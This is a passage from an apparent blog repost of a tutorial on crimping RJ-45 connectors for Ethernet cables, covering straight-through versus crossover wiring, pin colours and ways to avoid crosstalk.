out-of-spec and susceptible to crosstalk. Flatten and insure there are no spaces between wires. Hold the RJ-45 plug with the clip facing down or away from you. Push the wires firmly into the plug. Inspect each wire is flat even at the front of the plug. Check the order of the wires. Double check again. Check that the jacket is fitted right against the stop of the plug. Carefully hold the wire and firmly crimp the RJ-45 with the crimper. Check the color orientation, check that the crimped connection is not about to come apart, and check to see if the wires are flat against the front of the plug. If even one of these are incorrect, you will have to start over. Test the Ethernet cable. Ethernet Cable Tips: A straight-thru cable has identical ends. A crossover cable has different ends. A straight-thru is used as a patch cord in Ethernet connections. A crossover is used to connect two Ethernet devices without a hub or for connecting two hubs. A crossover has one end with the Orange set of wires switched with the Green set. Odd numbered pins are always striped, even numbered pins are always solid colored. Looking at the RJ-45 with the clip facing away from you, Brown is always on the right, and pin 1 is on the left. No more than 1/2″ of the Ethernet cable should be untwisted otherwise it will be susceptible to crosstalk. Do not deform, do not bend, do not stretch, do not staple, do not run parallel with power cables, and do not run Ethernet cables near noise inducing components. Basic Theory: By looking at a T-568A UTP Ethernet straight-thru cable and an Ethernet crossover cable with a T-568B end, we see that the TX (transmitter) pins are connected to the corresponding RX (receiver) pins, plus to plus and minus to minus. You can also see that both the blue and brown wire pairs on pins 4, 5, 7, and 8 are not used in either standard. What you may not realize is that, these same pins 4, 5, 7, and 8 are not used or required in 100BASE-TX as well. So why bother using these wires, well for one thing its simply easier to make a connection with all the wires grouped together. Otherwise you’ll be spending time trying to fit those tiny little wires into each of the corresponding holes in the RJ-45 connector. Date: 1/13/2001 The Internet Centre

March 4, 2008 Posted by jim11 | Uncategorized | Leave a Comment